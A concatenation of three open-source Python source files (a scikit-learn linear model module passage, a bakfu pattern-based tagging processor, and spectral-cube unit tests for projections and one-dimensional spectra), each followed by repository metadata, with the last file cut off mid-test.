indices = scores.argmax(axis=1)
return self.classes_[indices]
def _predict_proba_lr(self, X):
"""Probability estimation for OvR logistic regression.
Positive class probabilities are computed as
1. / (1. + np.exp(-self.decision_function(X)));
multiclass is handled by normalizing that over all classes.
"""
prob = self.decision_function(X)
prob *= -1
np.exp(prob, prob)
prob += 1
np.reciprocal(prob, prob)
if len(prob.shape) == 1:
return np.vstack([1 - prob, prob]).T
else:
# OvR normalization, like LibLinear's predict_probability
prob /= prob.sum(axis=1).reshape((prob.shape[0], -1))
return prob
class SparseCoefMixin(object):
"""Mixin for converting coef_ to and from CSR format.
L1-regularizing estimators should inherit this.
"""
def densify(self):
"""Convert coefficient matrix to dense array format.
Converts the ``coef_`` member (back) to a numpy.ndarray. This is the
default format of ``coef_`` and is required for fitting, so calling
this method is only required on models that have previously been
sparsified; otherwise, it is a no-op.
Returns
-------
self: estimator
"""
msg = "Estimator, %(name)s, must be fitted before densifying."
check_is_fitted(self, "coef_", msg=msg)
if sp.issparse(self.coef_):
self.coef_ = self.coef_.toarray()
return self
def sparsify(self):
"""Convert coefficient matrix to sparse format.
Converts the ``coef_`` member to a scipy.sparse matrix, which for
L1-regularized models can be much more memory- and storage-efficient
than the usual numpy.ndarray representation.
The ``intercept_`` member is not converted.
Notes
-----
For non-sparse models, i.e. when there are not many zeros in ``coef_``,
this may actually *increase* memory usage, so use this method with
care. A rule of thumb is that the number of zero elements, which can
be computed with ``(coef_ == 0).sum()``, must be more than 50% for this
to provide significant benefits.
After calling this method, further fitting with the partial_fit
method (if any) will not work until you call densify.
Returns
-------
self: estimator
"""
msg = "Estimator, %(name)s, must be fitted before sparsifying."
check_is_fitted(self, "coef_", msg=msg)
self.coef_ = sp.csr_matrix(self.coef_)
return self
class LinearRegression(LinearModel, RegressorMixin):
"""
Ordinary least squares Linear Regression.
Parameters
----------
fit_intercept : boolean, optional
whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional, default False
If True, the regressors X will be normalized before regression.
copy_X : boolean, optional, default True
If True, X will be copied; else, it may be overwritten.
n_jobs : int, optional, default 1
The number of jobs to use for the computation.
If -1 all CPUs are used. This will only provide speedup for
n_targets > 1 and sufficient large problems.
Attributes
----------
coef_ : array, shape (n_features, ) or (n_targets, n_features)
Estimated coefficients for the linear regression problem.
If multiple targets are passed during the fit (y 2D), this
is a 2D array of shape (n_targets, n_features), while if only
one target is passed, this is a 1D array of length n_features.
intercept_ : array
Independent term in the linear model.
Notes
-----
From the implementation point of view, this is just plain Ordinary
Least Squares (scipy.linalg.lstsq) wrapped as a predictor object.
"""
def __init__(self, fit_intercept=True, normalize=False, copy_X=True,
n_jobs=1):
self.fit_intercept = fit_intercept
self.normalize = normalize
self.copy_X = copy_X
self.n_jobs = n_jobs
def fit(self, X, y, sample_weight=None):
"""
Fit linear model.
Parameters
----------
X : numpy array or sparse matrix of shape [n_samples,n_features]
Training data
y : numpy array of shape [n_samples, n_targets]
Target values
sample_weight : numpy array of shape [n_samples]
Individual weights for each sample
Returns
-------
self : returns an instance of self.
"""
n_jobs_ = self.n_jobs
X, y = check_X_y(X, y, accept_sparse=['csr', 'csc', 'coo'],
y_numeric=True, multi_output=True)
if ((sample_weight is not None) and np.atleast_1d(sample_weight).ndim > 1):
sample_weight = column_or_1d(sample_weight, warn=True)
X, y, X_mean, y_mean, X_std = self._center_data(
X, y, self.fit_intercept, self.normalize, self.copy_X,
sample_weight=sample_weight)
if sample_weight is not None:
# Sample weight can be implemented via a simple rescaling.
X, y = _rescale_data(X, y, sample_weight)
if sp.issparse(X):
if y.ndim < 2:
out = sparse_lsqr(X, y)
self.coef_ = out[0]
self.residues_ = out[3]
else:
# sparse_lstsq cannot handle y with shape (M, K)
outs = Parallel(n_jobs=n_jobs_)(
delayed(sparse_lsqr)(X, y[:, j].ravel())
for j in range(y.shape[1]))
self.coef_ = np.vstack(out[0] for out in outs)
self.residues_ = np.vstack(out[3] for out in outs)
else:
self.coef_, self.residues_, self.rank_, self.singular_ = \
linalg.lstsq(X, y)
self.coef_ = self.coef_.T
if y.ndim == 1:
self.coef_ = np.ravel(self.coef_)
self._set_intercept(X_mean, y_mean, X_std)
return self
def _pre_fit(X, y, Xy, precompute, normalize, fit_intercept, copy,
Xy_precompute_order=None):
"""Aux function used at beginning of fit in linear models"""
n_samples, n_features = X.shape
if sparse.isspmatrix(X):
precompute = False
X, y, X_mean, y_mean, X_std = sparse_center_data(
X, y, fit_intercept, normalize)
else:
# copy was done in fit if necessary
X, y, X_mean, y_mean, X_std = center_data(
X, y, fit_intercept, normalize, copy=copy)
if hasattr(precompute, '__array__') and (
fit_intercept and not np.allclose(X_mean, np.zeros(n_features))
or normalize and not np.allclose(X_std, np.ones(n_features))):
warnings.warn("Gram matrix was provided but X was centered"
" to fit intercept, "
"or X was normalized : recomputing Gram matrix.",
UserWarning)
# recompute Gram
precompute = 'auto'
Xy = None
# precompute if n_samples > n_features
if precompute == 'auto':
precompute = (n_samples > n_features)
if precompute is True:
precompute = np.dot(X.T, X)
if Xy_precompute_order == 'F':
precompute = np.dot(X.T, X).T
if not hasattr(precompute, '__array__'):
Xy = None # cannot use Xy if precompute is not Gram
if hasattr(precompute, '__array__') and Xy is None:
if Xy_precompute_order == 'F':
Xy = np.dot(y.T, X).T
else:
Xy = np.dot(X.T, y)
return X, y, X_mean, y_mean, X_std, precompute, Xy
|
Fireblend/scikit-learn
|
sklearn/linear_model/base.py
|
Python
|
bsd-3-clause
| 16,019
|
# -*- coding: utf-8 -*-
'''
tag_treetagger.py
This module is a wrapper to TreeTagger.
'''
import os
import sys
import string
import six
import sklearn
from itertools import chain
from bakfu.core.routes import register
from bakfu.process.base import BaseProcessor
__errors__ = []
try:
import pattern.fr
except Exception:
e = sys.exc_info()
__errors__.append(e)
try:
import pattern.en
except Exception:
e = sys.exc_info()
if e[1].msg == "No module named 'pywordnet'":
# py3 incompatibility ; must be fixed in pattern
pass
else:
__errors__.append(e)
def tag(tagger, sentence):
'''
'''
lemmas = []
[lemmas.extend(a.lemma) for a in tagger(sentence,tokenize = True, tags = True, chunks = True, relations = True, lemmata = True, light = False)]
return lemmas
@register('tagging.pattern', __errors__)
class PatternTagger(BaseProcessor):
'''
Pre-processes data with pattern.
:Example:
.. doctest::
>>>from bakfu.examples.dataset1 import DATA
>>>import nltk
>>>baf = bakfu.Chain(lang="en")
>>>baf.load("data.simple",DATA)
>>>baf.process('tagging.pattern')
>>>baf.process('vectorize.sklearn',
... min_df = 2,
... ngram_range=(1, 3),
... #stop_words=nltk.corpus.stopwords.words(baf.get('language')),
... max_features=100,
... tokenizer=lambda x:x,
... )
... preprocessor=lambda x:x,
>>>print(baf.get_chain("vectorizer").get_feature_names())
>>>print(baf.get_chain("vectorizer_result").toarray()[0])
'''
init_args = ()
init_kwargs = ()
run_args = ()
run_kwargs = ()
def __init__(self, *args, **kwargs):
super(PatternTagger, self).__init__(*args, **kwargs)
self.tagger = None
def run(self, caller, *args, **kwargs):
'''
'''
super(PatternTagger, self).run(caller, *args, **kwargs)
data_source = caller.get_chain('data_source')
self.caller=caller
lang = caller.get('lang')
if lang == 'fr':
self.tagger = pattern.fr.parsetree
elif lang == 'en':
self.tagger = pattern.en.parsetree
cur_data = data_source.get_data()
result = [tag(self.tagger, s) for s in cur_data]
caller.data['result'] = result
#reformat data to ((id,data),...)
#note: data now contains lists of tokens instead of sentences
uids = data_source.get_uids()
new_data = zip(uids, result)
#Assign processed data to a new data source
new_data_source = self.caller.load_unchained("data.simple", new_data)
new_data_source.meta_data = {"tokenized":True}
self._data.update(
{'result':result,
'tagger_result':result,
'data_source':new_data_source,
})
return self
|
Succeed-Together/bakfu
|
process/tagging/tag_pattern.py
|
Python
|
bsd-3-clause
| 2,918
|
from __future__ import print_function, absolute_import, division
import warnings
import pytest
import numpy as np
from astropy import units as u
from astropy.wcs import WCS
from astropy.io import fits
from radio_beam import Beam, Beams
from .helpers import assert_allclose
from .test_spectral_cube import cube_and_raw
from ..spectral_cube import SpectralCube
from ..masks import BooleanArrayMask
from ..lower_dimensional_structures import (Projection, Slice, OneDSpectrum,
VaryingResolutionOneDSpectrum)
from ..utils import SliceWarning, WCSCelestialError, BeamUnitsError
from . import path
# needed for regression in numpy
import sys
try:
from astropy.utils.compat import NUMPY_LT_1_22
except ImportError:
# if astropy is an old version, we'll just skip the test
# (this is only used in one place)
NUMPY_LT_1_22 = False
# set up for parametrization
LDOs = (Projection, Slice, OneDSpectrum)
LDOs_2d = (Projection, Slice,)
two_qty_2d = np.ones((2,2)) * u.Jy
twelve_qty_2d = np.ones((12,12)) * u.Jy
two_qty_1d = np.ones((2,)) * u.Jy
twelve_qty_1d = np.ones((12,)) * u.Jy
data_two = (two_qty_2d, two_qty_2d, two_qty_1d)
data_twelve = (twelve_qty_2d, twelve_qty_2d, twelve_qty_1d)
data_two_2d = (two_qty_2d, two_qty_2d,)
data_twelve_2d = (twelve_qty_2d, twelve_qty_2d,)
def load_projection(filename):
hdu = fits.open(filename)[0]
proj = Projection.from_hdu(hdu)
return proj, hdu
@pytest.mark.parametrize(('LDO', 'data'),
zip(LDOs_2d, data_two_2d))
def test_slices_of_projections_not_projections(LDO, data):
# slices of projections that have <2 dimensions should not be projections
p = LDO(data, copy=False)
assert not isinstance(p[0,0], LDO)
assert not isinstance(p[0], LDO)
@pytest.mark.parametrize(('LDO', 'data'),
zip(LDOs_2d, data_twelve_2d))
def test_copy_false(LDO, data):
# copy the data so we can manipulate inplace without affecting other tests
image = data.copy()
p = LDO(image, copy=False)
image[3,4] = 2 * u.Jy
assert_allclose(p[3,4], 2 * u.Jy)
@pytest.mark.parametrize(('LDO', 'data'),
zip(LDOs, data_twelve))
def test_write(LDO, data, tmpdir):
p = LDO(data)
p.write(tmpdir.join('test.fits').strpath)
@pytest.mark.parametrize(('LDO', 'data'),
zip(LDOs_2d, data_twelve_2d))
def test_preserve_wcs_to(LDO, data):
# regression for #256
image = data.copy()
p = LDO(image, copy=False)
image[3,4] = 2 * u.Jy
p2 = p.to(u.mJy)
assert_allclose(p[3,4], 2 * u.Jy)
assert_allclose(p[3,4], 2000 * u.mJy)
assert p2.wcs == p.wcs
@pytest.mark.parametrize(('LDO', 'data'),
zip(LDOs, data_twelve))
def test_multiplication(LDO, data):
# regression: 265
p = LDO(data, copy=False)
p2 = p * 5
assert p2.unit == u.Jy
assert hasattr(p2, '_wcs')
assert p2.wcs == p.wcs
assert np.all(p2.value == 5)
@pytest.mark.parametrize(('LDO', 'data'),
zip(LDOs, data_twelve))
def test_unit_division(LDO, data):
# regression: 265
image = data
p = LDO(image, copy=False)
p2 = p / u.beam
assert p2.unit == u.Jy/u.beam
assert hasattr(p2, '_wcs')
assert p2.wcs == p.wcs
@pytest.mark.parametrize(('LDO', 'data'),
zip(LDOs_2d, data_twelve_2d))
def test_isnan(LDO, data):
# Check that np.isnan strips units
image = data.copy()
image[5,6] = np.nan
p = LDO(image, copy=False)
mask = np.isnan(p)
assert mask.sum() == 1
assert not hasattr(mask, 'unit')
@pytest.mark.parametrize(('LDO', 'data'),
zip(LDOs, data_twelve))
def test_self_arith(LDO, data):
image = data
p = LDO(image, copy=False)
p2 = p + p
assert hasattr(p2, '_wcs')
assert p2.wcs == p.wcs
assert np.all(p2.value==2)
p2 = p - p
assert hasattr(p2, '_wcs')
assert p2.wcs == p.wcs
assert np.all(p2.value==0)
@pytest.mark.parametrize(('LDO', 'data'),
zip(LDOs, data_twelve))
def test_self_arith_with_beam(LDO, data):
exp_beam = Beam(1.0 * u.arcsec)
image = data
p = LDO(image, copy=False)
p = p.with_beam(exp_beam)
p2 = p + p
assert hasattr(p2, '_wcs')
assert p2.wcs == p.wcs
assert np.all(p2.value==2)
assert p2.beam == exp_beam
p2 = p - p
assert hasattr(p2, '_wcs')
assert p2.wcs == p.wcs
assert np.all(p2.value==0)
assert p2.beam == exp_beam
@pytest.mark.xfail(raises=ValueError, strict=True)
def test_VRODS_wrong_beams_shape():
'''
Check that passing Beams with a different shape than the data
is caught.
'''
exp_beams = Beams(np.arange(1, 4) * u.arcsec)
p = VaryingResolutionOneDSpectrum(twelve_qty_1d, copy=False,
beams=exp_beams)
def test_VRODS_with_beams():
exp_beams = Beams(np.arange(1, twelve_qty_1d.size + 1) * u.arcsec)
p = VaryingResolutionOneDSpectrum(twelve_qty_1d, copy=False, beams=exp_beams)
assert (p.beams == exp_beams).all()
new_beams = Beams(np.arange(2, twelve_qty_1d.size + 2) * u.arcsec)
p = p.with_beams(new_beams)
assert np.all(p.beams == new_beams)
def test_VRODS_slice_with_beams():
exp_beams = Beams(np.arange(1, twelve_qty_1d.size + 1) * u.arcsec)
p = VaryingResolutionOneDSpectrum(twelve_qty_1d, copy=False,
wcs=WCS(naxis=1),
beams=exp_beams)
assert np.all(p[:5].beams == exp_beams[:5])
def test_VRODS_arith_with_beams():
exp_beams = Beams(np.arange(1, twelve_qty_1d.size + 1) * u.arcsec)
p = VaryingResolutionOneDSpectrum(twelve_qty_1d, copy=False, beams=exp_beams)
p2 = p + p
assert hasattr(p2, '_wcs')
assert p2.wcs == p.wcs
assert np.all(p2.value==2)
assert np.all(p2.beams == exp_beams)
p2 = p - p
assert hasattr(p2, '_wcs')
assert p2.wcs == p.wcs
assert np.all(p2.value==0)
assert np.all(p2.beams == exp_beams)
def test_onedspectrum_specaxis_units():
test_wcs = WCS(naxis=1)
test_wcs.wcs.cunit = ["m/s"]
test_wcs.wcs.ctype = ["VELO-LSR"]
p = OneDSpectrum(twelve_qty_1d, wcs=test_wcs)
assert p.spectral_axis.unit == u.Unit("m/s")
def test_onedspectrum_with_spectral_unit():
test_wcs = WCS(naxis=1)
test_wcs.wcs.cunit = ["m/s"]
test_wcs.wcs.ctype = ["VELO-LSR"]
p = OneDSpectrum(twelve_qty_1d, wcs=test_wcs)
p_new = p.with_spectral_unit(u.km/u.s)
assert p_new.spectral_axis.unit == u.Unit("km/s")
np.testing.assert_equal(p_new.spectral_axis.value,
1e-3*p.spectral_axis.value)
def test_onedspectrum_input_mask_type():
test_wcs = WCS(naxis=1)
test_wcs.wcs.cunit = ["m/s"]
test_wcs.wcs.ctype = ["VELO-LSR"]
np_mask = np.ones(twelve_qty_1d.shape, dtype=bool)
np_mask[1] = False
bool_mask = BooleanArrayMask(np_mask, wcs=test_wcs,
shape=np_mask.shape)
# numpy array
p = OneDSpectrum(twelve_qty_1d, wcs=test_wcs,
mask=np_mask)
assert (p.mask.include() == bool_mask.include()).all()
# MaskBase
p = OneDSpectrum(twelve_qty_1d, wcs=test_wcs,
mask=bool_mask)
assert (p.mask.include() == bool_mask.include()).all()
# No mask
ones_mask = BooleanArrayMask(np.ones(twelve_qty_1d.shape, dtype=bool),
wcs=test_wcs, shape=np_mask.shape)
p = OneDSpectrum(twelve_qty_1d, wcs=test_wcs,
mask=None)
assert (p.mask.include() == ones_mask.include()).all()
def test_slice_tricks():
test_wcs_1 = WCS(naxis=1)
test_wcs_2 = WCS(naxis=2)
spec = OneDSpectrum(twelve_qty_1d, wcs=test_wcs_1)
im = Slice(twelve_qty_2d, wcs=test_wcs_2)
with warnings.catch_warnings(record=True) as w:
new = spec[:,None,None] * im[None,:,:]
assert new.ndim == 3
# two warnings because we're doing BOTH slices!
assert len(w) == 2
assert w[0].category == SliceWarning
with warnings.catch_warnings(record=True) as w:
new = spec.array[:,None,None] * im.array[None,:,:]
assert new.ndim == 3
assert len(w) == 0
def test_array_property():
test_wcs_1 = WCS(naxis=1)
spec = OneDSpectrum(twelve_qty_1d, wcs=test_wcs_1)
arr = spec.array
# these are supposed to be the same object, but the 'is' tests fails!
assert spec.array.data == spec.data
assert isinstance(arr, np.ndarray)
assert not isinstance(arr, u.Quantity)
def test_quantity_property():
test_wcs_1 = WCS(naxis=1)
spec = OneDSpectrum(twelve_qty_1d, wcs=test_wcs_1)
arr = spec.quantity
# these are supposed to be the same object, but the 'is' tests fails!
assert spec.array.data == spec.data
assert isinstance(arr, u.Quantity)
assert not isinstance(arr, OneDSpectrum)
def test_projection_with_beam(data_55):
exp_beam = Beam(1.0 * u.arcsec)
proj, hdu = load_projection(data_55)
# uses from_hdu, which passes beam as kwarg
assert proj.beam == exp_beam
assert proj.meta['beam'] == exp_beam
# load beam from meta
exp_beam = Beam(1.5 * u.arcsec)
meta = {"beam": exp_beam}
new_proj = Projection(hdu.data, wcs=proj.wcs, meta=meta)
assert new_proj.beam == exp_beam
assert new_proj.meta['beam'] == exp_beam
# load beam from given header
exp_beam = Beam(2.0 * u.arcsec)
header = hdu.header.copy()
header = exp_beam.attach_to_header(header)
new_proj = Projection(hdu.data, wcs=proj.wcs, header=header,
read_beam=True)
assert new_proj.beam == exp_beam
assert new_proj.meta['beam'] == exp_beam
# load beam from beam object
exp_beam = Beam(3.0 * u.arcsec)
header = hdu.header.copy()
del header["BMAJ"], header["BMIN"], header["BPA"]
new_proj = Projection(hdu.data, wcs=proj.wcs, header=header,
beam=exp_beam)
assert new_proj.beam == exp_beam
assert new_proj.meta['beam'] == exp_beam
# Slice the projection with a beam and check it's still there
assert new_proj[:1, :1].beam == exp_beam
def test_ondespectrum_with_beam():
exp_beam = Beam(1.0 * u.arcsec)
test_wcs_1 = WCS(naxis=1)
spec = OneDSpectrum(twelve_qty_1d, wcs=test_wcs_1)
# load beam from meta
meta = {"beam": exp_beam}
new_spec = OneDSpectrum(spec.data, wcs=spec.wcs, meta=meta)
assert new_spec.beam == exp_beam
assert new_spec.meta['beam'] == exp_beam
# load beam from given header
hdu = spec.hdu
exp_beam = Beam(2.0 * u.arcsec)
header = hdu.header.copy()
header = exp_beam.attach_to_header(header)
new_spec = OneDSpectrum(hdu.data, wcs=spec.wcs, header=header,
read_beam=True)
assert new_spec.beam == exp_beam
assert new_spec.meta['beam'] == exp_beam
# load beam from beam object
exp_beam = Beam(3.0 * u.arcsec)
header = hdu.header.copy()
new_spec = OneDSpectrum(hdu.data, wcs=spec.wcs, header=header,
beam=exp_beam)
assert new_spec.beam == exp_beam
assert new_spec.meta['beam'] == exp_beam
# Slice the spectrum with a beam and check it's still there
assert new_spec[:1].beam == exp_beam
@pytest.mark.parametrize(('LDO', 'data'),
zip(LDOs, data_twelve))
def test_ldo_attach_beam(LDO, data):
exp_beam = Beam(1.0 * u.arcsec)
newbeam = Beam(2.0 * u.arcsec)
p = LDO(data, copy=False, beam=exp_beam)
new_p = p.with_beam(newbeam)
assert p.beam == exp_beam
assert p.meta['beam'] == exp_beam
assert new_p.beam == newbeam
assert new_p.meta['beam'] == newbeam
@pytest.mark.xfail(raises=BeamUnitsError, strict=True)
@pytest.mark.parametrize(('LDO', 'data'),
zip(LDOs, data_twelve))
def test_ldo_attach_beam_jybm_error(LDO, data):
exp_beam = Beam(1.0 * u.arcsec)
newbeam = Beam(2.0 * u.arcsec)
data = data.value * u.Jy / u.beam
p = LDO(data, copy=False, beam=exp_beam)
# Attaching with no beam should work.
new_p = p.with_beam(newbeam)
# Trying to change the beam should now raise a BeamUnitsError
new_p = new_p.with_beam(newbeam)
@pytest.mark.parametrize(('LDO', 'data'),
zip(LDOs_2d, data_two_2d))
def test_projection_from_hdu(LDO, data):
p = LDO(data, copy=False)
hdu = p.hdu
p_new = LDO.from_hdu(hdu)
assert (p == p_new).all()
def test_projection_subimage(data_55):
proj, hdu = load_projection(data_55)
proj1 = proj.subimage(xlo=1, xhi=3)
proj2 = proj.subimage(xlo=24.06269 * u.deg,
xhi=24.06206 * u.deg)
proj3 = proj.subimage(xlo=24.06269*u.deg, xhi=3)
proj4 = proj.subimage(xlo=1, xhi=24.06206*u.deg)
assert proj1.shape == (5, 2)
assert proj2.shape == (5, 2)
assert proj3.shape == (5, 2)
assert proj4.shape == (5, 2)
assert proj1.wcs.wcs.compare(proj2.wcs.wcs)
assert proj1.wcs.wcs.compare(proj3.wcs.wcs)
assert proj1.wcs.wcs.compare(proj4.wcs.wcs)
assert proj.beam == proj1.beam
assert proj.beam == proj2.beam
proj4 = proj.subimage(ylo=1, yhi=3)
proj5 = proj.subimage(ylo=29.93464 * u.deg,
yhi=29.93522 * u.deg)
proj6 = proj.subimage(ylo=1, yhi=29.93522 * u.deg)
proj7 = proj.subimage(ylo=29.93464 * u.deg, yhi=3)
assert proj4.shape == (2, 5)
assert proj5.shape == (2, 5)
assert proj6.shape == (2, 5)
assert proj7.shape == (2, 5)
assert proj4.wcs.wcs.compare(proj5.wcs.wcs)
assert proj4.wcs.wcs.compare(proj6.wcs.wcs)
assert proj4.wcs.wcs.compare(proj7.wcs.wcs)
# Test mixed slicing in both spatial directions
proj1xy = proj.subimage(xlo=1, xhi=3, ylo=1, yhi=3)
proj2xy = proj.subimage(xlo=24.06269*u.deg, xhi=3,
ylo=1,yhi=29.93522 * u.deg)
proj3xy = proj.subimage(xlo=1, xhi=24.06206*u.deg,
ylo=29.93464 * u.deg, yhi=3)
assert proj1xy.shape == (2, 2)
assert proj2xy.shape == (2, 2)
assert proj3xy.shape == (2, 2)
assert proj1xy.wcs.wcs.compare(proj2xy.wcs.wcs)
assert proj1xy.wcs.wcs.compare(proj3xy.wcs.wcs)
proj5 = proj.subimage()
assert proj5.shape == proj.shape
assert proj5.wcs.wcs.compare(proj.wcs.wcs)
assert np.all(proj5.value == proj.value)
def test_projection_subimage_nocelestial_fail(data_255_delta, use_dask):
cube, data = cube_and_raw(data_255_delta, use_dask=use_dask)
proj = cube.moment0(axis=1)
with pytest.raises(WCSCelestialError,
match="WCS does not contain two spatial axes."):
proj.subimage(xlo=1, xhi=3)
@pytest.mark.parametrize('LDO', LDOs_2d)
def test_twod_input_mask_type(LDO):
test_wcs = WCS(naxis=2)
test_wcs.wcs.cunit = ["deg", "deg"]
test_wcs.wcs.ctype = ["RA---SIN", 'DEC--SIN']
np_mask = np.ones(twelve_qty_2d.shape, dtype=bool)
np_mask[1] = False
bool_mask = BooleanArrayMask(np_mask, wcs=test_wcs,
shape=np_mask.shape)
# numpy array
p = LDO(twelve_qty_2d, wcs=test_wcs,
mask=np_mask)
assert (p.mask.include() == bool_mask.include()).all()
# MaskBase
p = LDO(twelve_qty_2d, wcs=test_wcs,
mask=bool_mask)
assert (p.mask.include() == bool_mask.include()).all()
# No mask
ones_mask = BooleanArrayMask(np.ones(twelve_qty_2d.shape, dtype=bool),
wcs=test_wcs, shape=np_mask.shape)
p = LDO(twelve_qty_2d, wcs=test_wcs,
mask=None)
assert (p.mask.include() == ones_mask.include()).all()
@pytest.mark.xfail
def test_mask_convolve():
# Numpy is fundamentally incompatible with the objects we have created.
# np.ma.is_masked(array) checks specifically for the array's _mask
# attribute. We would have to refactor deeply to correct this, and I
# really don't want to do that because 'None' is a much more reasonable
# and less dangerous default for a mask.
test_wcs_1 = WCS(naxis=1)
spec = OneDSpectrum(twelve_qty_1d, wcs=test_wcs_1)
assert spec.mask is False
from astropy.convolution import convolve,Box1DKernel
convolve(spec, Box1DKernel(3))
def test_convolve():
test_wcs_1 = WCS(naxis=1)
spec = OneDSpectrum(twelve_qty_1d, wcs=test_wcs_1)
from astropy.convolution import Box1DKernel
specsmooth = spec.spectral_smooth(Box1DKernel(1))
np.testing.assert_allclose(spec, specsmooth)
def test_spectral_interpolate():
test_wcs_1 = WCS(naxis=1)
test_wcs_1.wcs.cunit[0] = 'GHz'
spec = OneDSpectrum(np.arange(12)*u.Jy, wcs=test_wcs_1)
new_xaxis = test_wcs_1.wcs_pix2world(np.linspace(0,11,23), 0)[0] * u.Unit(test_wcs_1.wcs.cunit[0])
new_spec = spec.spectral_interpolate(new_xaxis)
np.testing.assert_allclose(new_spec, np.linspace(0,11,23)*u.Jy)
def test_spectral_interpolate_with_mask(data_522_delta, use_dask):
hdu = fits.open(data_522_delta)[0]
# Swap the velocity axis so indiff < 0 in spectral_interpolate
hdu.header["CDELT3"] = - hdu.header["CDELT3"]
cube = SpectralCube.read(hdu, use_dask=use_dask)
mask = np.ones(cube.shape, dtype=bool)
mask[:2] = False
masked_cube = cube.with_mask(mask)
spec = masked_cube[:, 0, 0]
# midpoint between each position
sg = (spec.spectral_axis[1:] + spec.spectral_axis[:-1])/2.
result = spec.spectral_interpolate(spectral_grid=sg[::-1])
# The output makes CDELT3 > 0 (reversed spectral axis) so the masked
# portion are the final 2 channels.
np.testing.assert_almost_equal(result.filled_data[:].value,
[0.0, 0.5, np.NaN, np.NaN])
def test_spectral_interpolate_reversed(data_522_delta, use_dask):
cube, data = cube_and_raw(data_522_delta, use_dask=use_dask)
# Reverse spectral axis
sg = cube.spectral_axis[::-1]
spec = cube[:, 0, 0]
result = spec.spectral_interpolate(spectral_grid=sg)
np.testing.assert_almost_equal(sg.value, result.spectral_axis.value)
def test_spectral_interpolate_with_fillvalue(data_522_delta, use_dask):
cube, data = cube_and_raw(data_522_delta, use_dask=use_dask)
# Step one channel out of bounds.
sg = ((cube.spectral_axis[0]) -
(cube.spectral_axis[1] - cube.spectral_axis[0]) *
np.linspace(1,4,4))
spec = cube[:, 0, 0]
result = spec.spectral_interpolate(spectral_grid=sg,
fill_value=42)
np.testing.assert_almost_equal(result.value,
np.ones(4)*42)
def test_spectral_units(data_255_delta, use_dask):
# regression test for issue 391
cube, data = cube_and_raw(data_255_delta, use_dask=use_dask)
sp = cube[:,0,0]
assert sp.spectral_axis.unit == u.km/u.s
assert sp.header['CUNIT1'] == 'km s-1'
sp = cube.with_spectral_unit(u.m/u.s)[:,0,0]
assert sp.spectral_axis.unit == u.m/u.s
assert sp.header['CUNIT1'] in ('m s-1', 'm/s')
def test_repr_1d(data_255_delta, use_dask):
cube, data = cube_and_raw(data_255_delta, use_dask=use_dask)
sp = cube[:,0,0]
print(sp)
print(sp[1:-1])
assert 'OneDSpectrum' in sp.__repr__()
assert 'OneDSpectrum' in sp[1:-1].__repr__()
def test_1d_slices(data_255_delta, use_dask):
cube, data = cube_and_raw(data_255_delta, use_dask=use_dask)
sp = cube[:,0,0]
assert sp.max() == cube.max(axis=0)[0,0]
assert not isinstance(sp.max(), OneDSpectrum)
sp = cube[:-1,0,0]
assert sp.max() == cube[:-1,:,:].max(axis=0)[0,0]
assert not isinstance(sp.max(), OneDSpectrum)
# TODO: Unpin when Numpy bug is resolved.
@pytest.mark.skipif(not NUMPY_LT_1_22 and sys.platform == 'win32',
reason='https://github.com/numpy/numpy/issues/20699')
@pytest.mark.parametrize('method',
('min', 'max', 'std', 'mean', 'sum', 'cumsum',
'nansum', 'ptp', 'var'),
)
def test_1d_slice_reductions(method, data_255_delta, use_dask):
cube, data = cube_and_raw(data_255_delta, use_dask=use_dask)
sp = cube[:,0,0]
if hasattr(cube, method):
spmethod = getattr(sp, method)
cubemethod = getattr(cube, method)
assert spmethod() == cubemethod(axis=0)[0,0]
else:
method = getattr(sp, method)
result = method()
assert hasattr(sp, '_fill_value')
assert 'OneDSpectrum' in sp.__repr__()
assert 'OneDSpectrum' in sp[1:-1].__repr__()
def test_1d_slice_round(data_255_delta, use_dask):
cube, data = cube_and_raw(data_255_delta, use_dask=use_dask)
sp = cube[:,0,0]
assert all(sp.value.round() == sp.round().value)
assert hasattr(sp, '_fill_value')
assert hasattr(sp.round(), '_fill_value')
assert 'OneDSpectrum' in sp.round().__repr__()
assert 'OneDSpectrum' in sp[1:-1].round().__repr__()
def test_LDO_arithmetic(data_vda, use_dask):
cube, data = cube_and_raw(data_vda, use_dask=use_dask)
sp = cube[:,0,0]
spx2 = sp * 2
assert np.all(spx2.value == sp.value*2)
assert np.all(spx2.filled_data[:].value == sp.value*2)
def test_beam_jtok_2D(data_advs, use_dask):
cube, data = cube_and_raw(data_advs, use_dask=use_dask)
cube._meta['BUNIT'] = 'Jy / beam'
cube._unit = u.Jy / u.beam
plane = cube[0]
freq = cube.with_spectral_unit(u.GHz).spectral_axis[0]
equiv = plane.beam.jtok_equiv(freq)
jtok = plane.beam.jtok(freq)
Kplane = plane.to(u.K, equivalencies=equiv, freq=freq)
np.testing.assert_almost_equal(Kplane.value,
(plane.value * jtok).value)
# test that the beam equivalencies are correctly automatically defined
Kplane = plane.to(u.K, freq=freq)
np.testing.assert_almost_equal(Kplane.value,
(plane.value * jtok).value)
bunits_list = [u.Jy / u.beam, u.K, u.Jy / u.sr, u.Jy / u.pix, u.Jy / u.arcsec**2,
u.mJy / u.beam, u.mK]
@pytest.mark.parametrize(('init_unit'), bunits_list)
def test_unit_conversions_general_2D(data_advs, use_dask, init_unit):
cube, data = cube_and_raw(data_advs, use_dask=use_dask)
cube._meta['BUNIT'] = init_unit.to_string()
cube._unit = init_unit
plane = cube[0]
# Check all unit conversion combos:
for targ_unit in bunits_list:
newplane = plane.to(targ_unit)
if init_unit == targ_unit:
np.testing.assert_almost_equal(newplane.value,
plane.value)
else:
roundtrip_plane = newplane.to(init_unit)
np.testing.assert_almost_equal(roundtrip_plane.value,
plane.value)
# TODO: Our 1D object do NOT retain spatial info that is needed for other BUNIT conversion
# e.g., Jy/sr, Jy/pix. So we're limited to Jy/beam -> K conversion for now
# See: https://github.com/radio-astro-tools/spectral-cube/pull/395
bunits_list_1D = [u.Jy / u.beam, u.K,
u.mJy / u.beam, u.mK]
@pytest.mark.parametrize(('init_unit'), bunits_list_1D)
def test_unit_conversions_general_1D(data_advs, use_dask, init_unit):
cube, data = cube_and_raw(data_advs, use_dask=use_dask)
cube._meta['BUNIT'] = init_unit.to_string()
cube._unit = init_unit
spec = cube[:, 0, 0]
# Check all unit conversion combos:
for targ_unit in bunits_list_1D:
newspec = spec.to(targ_unit)
if init_unit == targ_unit:
np.testing.assert_almost_equal(newspec.value,
spec.value)
else:
roundtrip_spec = newspec.to(init_unit)
np.testing.assert_almost_equal(roundtrip_spec.value,
